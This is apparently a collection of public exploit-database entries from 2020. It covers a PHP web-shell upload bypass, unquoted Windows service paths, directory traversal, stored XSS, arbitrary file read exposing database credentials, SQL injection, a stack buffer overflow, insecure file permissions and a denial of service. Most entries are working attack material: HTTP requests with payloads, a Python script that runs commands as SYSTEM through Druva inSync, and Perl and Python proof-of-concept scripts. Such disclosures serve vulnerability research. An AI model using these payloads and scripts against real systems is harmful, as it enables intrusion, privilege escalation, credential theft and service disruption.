boundary=---------------------------2104557667975595321153031663
Content-Length: 718
DNT: 1
Connection: close
Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
Upgrade-Insecure-Requests: 1
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="subject"
DEDED
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="message"
<p>DEDED</p>
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
Content-Type: text/php
<?php phpinfo(); ?>
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="filecount[]"
1
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="submit_staff"
Send
-----------------------------2104557667975595321153031663--
------------------------------------
*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
- Admin user can update user profile photo
------------------------------------
if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
$ext = explode(".",$_FILES['pre_image']['name']);
$str = date("mdY_hms");
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
$updir = "images/student_photos/";
$uppath = $updir.$new_thumbname;
move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
$file = $new_thumbname;
------------------------------------
Bypass Technique:
------------------------------------
$_FILES['pre_image']['name']; --- > shell.php.png
$ext = explode(".",$_FILES['pre_image']['name']);
---
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
$ext[0] --> shell
$ext[1] --> php
lastfilename --> st_date_shell.php
# Exploit Title: NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-04-27
# Vendor Homepage: https://www.nvidia.com/es-la/
# Software Link : https://www.nvidia.com/es-la/
# Tested Version: 1.0.21
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """
NVIDIA Update Service Daemon nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe Auto
C:\>sc qc nvUpdatusService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: nvUpdatusService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START (DELAYED)
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : NVIDIA Update Service Daemon
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: .\UpdatusUser
C:\>
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
# Title: Easy Transfer 1.7 for iOS - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-27
# Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078
# CVE: N/A
Document Title:
===============
Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2223
Common Vulnerability Scoring System:
====================================
7.1
Affected Product(s):
====================
Rubikon Teknoloji
Product: Easy Transfer v1.7 - iOS Mobile Web-Application
(Copy of the Homepage:
https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 )
Vulnerability Disclosure Timeline:
==================================
2020-04-27: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
1.1
A directory traversal web vulnerability has been discovered in the Easy
Transfer Wifi Transfer v1.7 ios mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.
The directory-traversal web vulnerability is located in the main
application path request performed via GET method. Attackers are
able to request for example the local path variables of the web-server
by changing the local path in the performed request itself.
In a first request the attack changes the path, the host redirects to
complete the adress with "..". Then the attacker just
attaches /.. a final slash to its request and the path can be accessed
via web-browser to download or list local files.
Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.
1.2
Multiple persistent cross site scripting vulnerability has been
discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.
The persistent vulnerabilities are located in the `Create Folder` and
`Move/Edit` functions. Attackers are able to inject own malicious
script codes to the `oldPath`, `newPath` and `path` parameters. The
request method to inject is POST and the attack vector is located on
the application-side.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Create Folder
[+] Move/Edit
Vulnerable Parameter(s):
[+] oldPath
[+] newPath
[+] path
Proof of Concept (PoC):
=======================
1.1
The directory traversal web vulnerability can be exploited by remote
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Exploitation
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
[{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}]
--- PoC Session Logs [GET] --- (list)
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
GET: HTTP/1.1 200 OK
Content-Length: 213
Content-Type: application/json
Connection: Close
1.2
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi network access with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Exploitation
<scriptx00>alert(document.domain)</script>
--- PoC Session Logs [POST] --- (Create & Move)
http://localhost/create
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
path=/test<scriptx00>alert(document.domain)</script>
-
POST: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 2
Content-Type: application/json
Connection: Close
-
http://localhost/move
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/test/<scriptx00>alert(document.domain)</script>&newPath=/test<scriptx00>alert(document.domain)</script>
-
POST: HTTP/1.1 200 OK
Content-Length: 411
Content-Type: text/html; charset=utf-8
Connection: Close
- [GET] (Execution)
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: http://localhost/
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT
# CVE: N/A
Vulnerable code: (/student_staff/download.php)
- File Name: download.php
- Content of the download.php
<?php
if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
$file = $_REQUEST['document'];
header("Content-type: application/force-download");
header("Content-Transfer-Encoding: Binary");
header("Content-length: ".filesize($file));
header("Content-disposition: attachment; filename=\"".$file."\"");
readfile($file);
exit;
}
?>
------------
*Payload:*
---------------
http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php
------------------------
*After run payload: (we accessed of the file content)*
------------------------
<?php
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'aroxi********');
define('DB_SERVER_PASSWORD', 'erp**********');
define('DB_DATABASE', 'aroxi****************');
?>
# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-04-28
# Vendor Homepage: https://andreaelectronics.com/
# Software Link : https://andreaelectronics.com/
# Tested Version: 1.0.64.7
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """
Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto
C:\>sc qc AESTFilters
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AESTFilters
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Andrea ST Filters Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
# Exploit Title: Druva inSync Windows Client 6.5.2 - Local Privilege Escalation
# Date: 2020-04-28
# Exploit Author: Chris Lyne
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
# Version: 6.5.2
# Tested on: Windows 10
# CVE : CVE-2019-3999
# See also: https://www.tenable.com/security/research/tra-2020-12
import socket
import struct
import sys
# Command injection in inSyncCPHwnet64 RPC service
# Runs as nt authority\system. so we have a local privilege escalation
if len(sys.argv) < 2:
print "Usage: " + __file__ + " <quoted command to execute>"
print "E.g. " + __file__ + " \"net user /add tenable\""
sys.exit(0)
ip = '127.0.0.1'
port = 6064
command_line = sys.argv[1]
# command gets passed to CreateProcessW
def make_wide(str):
new_str = ''
for c in str:
new_str += c
new_str += '\x00'
return new_str
hello = "inSync PHC RPCW[v0002]"
func_num = "\x05\x00\x00\x00" # 05 is to run a command
command_line = make_wide(command_line)
command_length = struct.pack('<i', len(command_line))
# send each request separately
requests = [ hello, func_num, command_length, command_line ]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
i = 1
for req in requests:
print 'Sending request' + str(i)
sock.send(req)
i += 1
sock.close()
print "Done."
# Exploit Title: hits script 1.0 - 'item_name' SQL Injection
# Date: 2020-04-27
# Exploit Author: SajjadBnd
# Vendor Homepage: https://hits.ir
# Software Link: http://dl.persianscript.ir/script/hitsir-script-persian%28PersianScript.ir%29.zip
# Software Link(mirror): http://dl.nuller.ir/hitsir-script-persian[www.nuller.ir].zip
# Version: 1.0
# Tested on: Win10 Professional x64
[ description of script ]
With this script you can set up a site to exchange statistics and traffic as well as
increase rankings. In this script, it is possible to exchange Google +1,
exchange Facebook points, exchange Twitter followers,
exchange YouTube visitors, exchange visit statistics.
[ poc ]
file : ipn.php
parameters : 'item_name' , 'item_number'
method : POST
source [
36: mysql_query $pack = mysql_fetch_object(mysql_query("SELECT * FROM `c_pack` WHERE `name`='{$item_name}' AND `coins`='{$item_number}'"));
19: $item_name = $_POST['item_name'];
20: $item_number = $_POST['item_number'];
requires:
4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
31: if(!$fp) else
35: if(strcmp($res, "VERIFIED") == 0)
]
parameter : 'custom'
method : POST
source [
43: mysql_query mysql_query("UPDATE `users` SET `coins`=`coins`+'{$pack->coins}' WHERE `id`='{$custom}'");
27: $custom = $_POST['custom'];
requires:
4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
31: if(!$fp) else
35: if(strcmp($res, "VERIFIED") == 0)
41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
]
parameters : 'item_name','mc_gross'
method : POST
source [
44: mysql_query mysql_query("INSERT INTO `transactions` (user, points, pack, money, date) VALUES('{$user->login}', '{$pack->coins}', '{$item_name}', '{$payment_amount}', NOW())");
19: $item_name = $_POST['item_name'];
22: $payment_amount = $_POST['mc_gross'];
requires:
4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
31: if(!$fp) else
35: if(strcmp($res, "VERIFIED") == 0)
41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
]
file : register.php
parameters : 'PlusREF','register'
method : COOKIE,POST
source [
22: mysql_query $user1 = mysql_query("SELECT * FROM `users` WHERE `id`='{$ref}'");
21: $ref = $_COOKIE['PlusREF'];
requires:
3: if(isset($_POST['register']))
19: if(!checkpwd ($sec['password'], $sec['password2'])) else
20: if(isset($_COOKIE['PlusREF']))
]
&
source [
40: mysql_query mysql_query("INSERT INTO `users`(email,login,IP,pass,passdecoded,ref,signup,activate) values('{$sec['email']}','{$sec['user']}','$final','$passc','$passa','{$ref}',NOW(),'{$activare}')") or
37: $final = visitorip ();
39: $passc = md5($passa);
38: $passa = $sec['password'];
38: $passa = $sec['password'];
21: $ref = $_COOKIE['PlusREF']; // if(isset($_COOKIE)),
26: $activare = rand(000000000, 999999909);
requires:
3: if(isset($_POST['register']))
19: if(!checkpwd ($sec['password'], $sec['password2'])) else
]
# Title: Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)
# Author: Vulnerability Laboratory
# Date: 2020-04-28
# Vendor: https://www.internetdownloadmanager.com
# Software: https://www.internetdownloadmanager.com/download.html
# CVE: N/A
Document Title:
===============
Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2236
Common Vulnerability Scoring System:
====================================
7.1
Vulnerability Disclosure Timeline:
==================================
2020-04-28: Public Disclosure (Vulnerability Laboratory)
(Copy of the Homepage:
https://www.internetdownloadmanager.com/support/about_us.html )
(Sofwtare Product: https://www.internetdownloadmanager.com/download.html)
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
Multiple stack buffer overflow vulnerabilities has been discovered in
the official Internet Download Manager v6.37.11.1 software.
The bufer overflow allows to overwrite registers of the process to
compromise the file-system by elevates local process privileges.
1.1
The first stack buffer overflow is located in the `search` function of
the downloads menu. The search function itself does not use
any secure restriction in the requested search variable of the inputs.
Local attackers with access to the software are able to overflow
the registers to elevate local process privileges. Thus allows a local
attacker to compromise the local computer- or file-system.
1.2
The second stack buffer overflow is located in the `Export/Import`
function of the tasks menu. Local users are able to import and
export the download tasks as *.ef2 file. Local attackers are able to
import manipulated *.ef2 files with manipulated referer and
source url to overwrite the eip register. The issue occurs because of
the insufficient ef2 filetype (context) validation process
that does not perform any length restrictions.
The security risk of the local stack buffer overflow vulnerabilities in
the software are estimated as high with a cvss count of 7.1.
Exploitation of the buffer overflow vulnerability requires a low
privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in overwrite of the
active registers to compromise of the computer system or process.
Vulnerable Module(s):
[+] Search
[+] Import/Export (ef2)
Proof of Concept (PoC):
=======================
1.1
The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the software
2. Click the downloads menu and open the search
3. Inject a large unicode payload inside the search input field and transmit
4. The software crashs with several uncaught exception because of
overwritten register (0168D8F0)
5. Successful reproduce of the local buffer overflow vulnerability!
--- Debug Logs (0168D8F0) ---
00d61850 668b08 mov cx,word ptr [eax] ds:002b:41414141
-
00D6186D |. 56 PUSH ESI ; /Arg1
-
00D61882 |. E8 59FFFFFF CALL IDMan.00D617E0 ;
IDMan.00D617E0
-
00D6189B |> 50 PUSH EAX ; /Arg1
-
00D6189E |. E8 3DFFFFFF CALL IDMan.00D617E0 ;
IDMan.00D617E0
-
Call stack
Address=0168C79C
Stack=00DFE0F2
Procedure / arguments=IDMan.00D617E0
Called from=IDMan.00DFE0ED
Frame=0168E02C
-
SEH chain
Address SE handler
0168C790 IDMan.00F751E8
0168D8F0 41414141
-
EAX 41414141
ECX 01680000
EDX 41414141
EBX 00000001
ESP 0168C76C
EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
EDI 00410043
EIP 00D61850 IDMan.00D61850
Executable modules
Base=00D60000
Size=00539000 (5476352.)
Entry=00F5CB1C IDMan.<ModuleEntryPoint>
Name=IDMan
File version=6, 37, 11, 2
Path=C:Program Files (x86)Internet Download ManagerIDMan.exe
1.2
The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the software
2. Start the bof_poc.pl
3. Open the tasks menu
4. Click import and import *.ef2 poc
Note: The software process crashs on import with uncaught exception
5. Successful reproduce of the local buffer overflow vulnerability!
Usage Example: Export/Import (*.ef2)
<
https://www.vulnerability-lab.com/download_content.php?id=1337
referer: https://www.vulnerability-lab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
>
PoC: Exploit
#!/usr/bin/perl
# Local Stack Buffer Overflow Exploit for Internet Download Manager
v6.37.11.1
# Vulnerability Laboratory - Benjamin Kunz Mejri
my $poc = "bof_poc.ef2" ;
print "[+] Producing bof_poc.ef2 ..." ;
my $buff0=" "."<" x 1;
my $buff1=" n https://"."A" x 1024;
my $buff2=" n Referer:"."A" x 1024;
my $buff3=" n User Agent:"."A" x 1024;
my $buff4=" n ".">" x 1;
open(ef2, ">>$poc") or die "Cannot open $poc";
print ef2 $buff0;
print ef2 $buff1;
print ef2 $buff2;
print ef2 $buff3;
print ef2 $buff4;
close(ef2);
print "n[+] done !";
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Exploit Title: EmEditor 19.8 - Insecure File Permissions
# Date: 2020-04-27
# Exploit Author: SajjadBnd
# Vendor Homepage: https://www.emeditor.com/
# Software Link: https://support.emeditor.com/en/downloads/suggested
# Version: 19.8
# Tested on: Win10 Professional x64
[ Description ]
EmEditor is a fast, lightweight, yet extensible, easy-to-use text editor for Windows.
Both native 64-bit and 32-bit builds are available, and moreover,
the 64-bit includes separate builds for SSE2 (128-bit), AVX-2 (256-bit),
and AVX-512 (512-bit) instruction sets.
[ PoC ]
C:\Users\user\AppData\Local\Programs\EmEditor
λ icacls *.exe
ee128.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
ee256.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
ee512.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
EEAdmin.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
eehlpver.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
eeupdate.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
emedhtml.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
EmEditor.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
emedtray.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
emedws.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
Successfully processed 10 files; Failed processing 0 files
[ Exploit - Privilege Escalation ]
Replace any *.exe files with any executable
malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
- Also you can use DLL Hijacking technique(emonig.dll,emregexp.dll,emtoast.dll..) ;D
# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC)
# Author: Dolev Farhi
# Date: 2020-04-29
# Vulnerable version: 3.0.2 (14)
# Link: http://www.sunnysidesoft.com/
# CVE: N/A
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from pygen.example import Example
host = '192.168.1.1'
port = 57110
try:
transport = TSocket.TSocket(host, port)
transport = TTransport.TBufferedTransport(transport)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = Example.Client(protocol)
transport.open()
client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
transport.close()
except Thrift.TException as tx:
print(tx.message)
# Exploit Title: ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting
# Exploit Author: Bobby Cooke
# Date: 2020-04-29
# Software Link: https://github.com/tmorrell/cheminv
# Software Info:
# "Cheminv is a web-based chemical inventory system. This responsive database provides an accessible way to organize and order chemicals, and is provided as an open-source package for all non-commercial users."
# "Cheminv was created by Thomas Morrell for the Haw Yang Lab at Princeton University"
# "Cheminv is based on ecDB www.ecDB.net, which was created by Nils Fredriksson aka. ElectricMan and designed by Buildlog."
# Version: 1
# Tested On: CentOS
# Vulnerability Type:
# ChemInv suffers from a persistent cross-site scripting vulnerability(XSS). This vulnerability can be exploited to have all users of the system, with read access to the project, execute malicious client-side code; every time the users views the 'Projects' or 'Add Chemicals' tab.
# The application's source code mitigates SQL injection (SQLi), but fails to sanitize HTML and JavaScript injections to the SQL database.
# Vulnerable Source Code
## proj_list.php
33 include('include/include_proj_add.php');
34 $AddProj = new ProjAdd;
35 $AddProj->AddProj();
36
37 $proj_query = mysql_query("SELECT * FROM projects WHERE project_owner= $owner");
## include/include_proj_add.php
2 class ProjAdd {
3 public function AddProj () {
4
5 require_once('include/login/auth.php');
6 include('include/mysql_connect.php');
7
8 if(isset($_POST['submit'])) {
9 $owner = $_SESSION['SESS_MEMBER_ID'];
10 $name = mysql_real_escape_string($_POST['name']);
11
12 if ($name == '') {
13 echo '<div class="message red">';
14 echo 'You have to specify a name!';
15 echo '</div>';
16 }
17 else {
18 $sql="INSERT into projects (project_owner, project_name) VALUES ('$owner', '$name')";
19 $sql_exec = mysql_query($sql);
# Malicious POST Request to https://TARGET/proj_list.php
POST /proj_list.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/proj_list.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Connection: close
Cookie: PHPSESSID=7af5kg3to8fstfum0to1ukpb85
name=evilProject<script>alert('XSS');</script>&submit=